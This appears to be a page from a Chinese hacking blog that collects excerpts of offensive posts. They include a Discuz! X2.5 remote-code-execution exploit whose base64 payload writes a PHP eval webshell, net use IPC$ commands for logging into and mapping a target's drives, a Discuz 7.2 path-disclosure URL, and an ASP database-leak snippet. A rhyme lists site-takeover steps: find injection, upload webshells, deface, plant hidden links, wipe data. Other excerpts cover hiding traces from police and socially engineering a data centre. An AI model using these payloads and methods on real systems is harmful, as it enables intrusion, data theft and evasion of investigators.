漏洞原因:暴库
http://127.0.0.1/topconn.asp 文件代码如下:
<%
dim db
id=replace(trim(request.form(“id”)),”and”,”")
db=”../data/data.mdb”
Set conn =[......]
-
近期文章
近期评论
- SXnake 发表在《防止U盘中病毒小技巧》
- ff 发表在《防止U盘中病毒小技巧》
- SXnake 发表在《假面exeU盘病毒 感染系统全部exe文件》
友情链接
功能
DZ2.5漏洞 Discuz! X2.5 远程代码执行漏洞及EXP
1.注册任意账户 2.登陆用户,发表blog日志(注意是日志) 3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}[......]
MySQL injection attack and smb relay
Shortcut(lnk) hijacking and smb relay
DOS常用入侵命令
net use \\ip\ipc$ ” ” /user:” ” 建立IPC空链接
net use \\ip\ipc$ “密码” /user:”用户名” 建立IPC非空链接
net use h: \\ip\c$ “密码” /user:”用户名” 直接登陆后映射对方C:到本地为H[......]
net use \\ip\ipc$ “密码” /user:”用户名” 建立IPC非空链接
net use h: \\ip\c$ “密码” /user:”用户名” 直接登陆后映射对方C:到本地为H[......]
拿站三字经
进谷歌 找注入
没注入 就旁注
没旁注 用Oday
没Oday 猜目录
没目录 就嗅探
拿不下 去自杀
爆账户 找后台
传小马 放大马
拿权限 挂页面
放暗链 清数据
社会工程学:网络工程师必须具备的反侦察能力
什么是反查技术?即反侦查技术。在黑客攻击中,最重要的一部分不是成功侵入主机,而是清除痕迹,不要让管理者发现被侵入及数据被伪造。同理,社会工程学也有这样的概念,那么,我们得清除哪些痕迹以免遭网络警察(以下称之为网警)的发现?这一部分我们从网警角度来看问题,看看他们如何来能否找到社会工程师的蛛丝马迹。或[......]
经典社会工程学渗透IDC机房服务器
周末无聊,和眼圈聊天,告诉他我在用社会工程搞一个站点,真是没想到他竟然也在忙这个,我搞的是ARM产品的,拿到了系统管理员的密码。他竟然是在搞一个IDC公司,而且已经获得整个机房的管理员权限。看来目前的社会工程是很火的,本着发扬共享精神得原则,我们把自己的一点心得发出来,供大家参考,不足之处,还望大家[......]
DZ7.2最新爆路径0day
方法:网址后面加上“manyou/admincp.php?my_suffix=%0A%0DTOBY57”(双引号不是)
例如:XXX。XXX。com/manyou/admincp.php?my_suffix=%0A%0DTOBY57
shop363网店程序真正通杀漏洞0day利用
这个程序安全不是很好,不过其中的一个replace()函数写的很好,不过没有找到是怎么写的,将注射中的“空格、select、%20、+号、还有/**/等过滤为空。在搜索出存在漏洞语句很麻烦 ,我也不写了,直接来个釜底抽薪的方法,直接拿密码账号很快的。
关键字:技术支持:shop363.net [......]
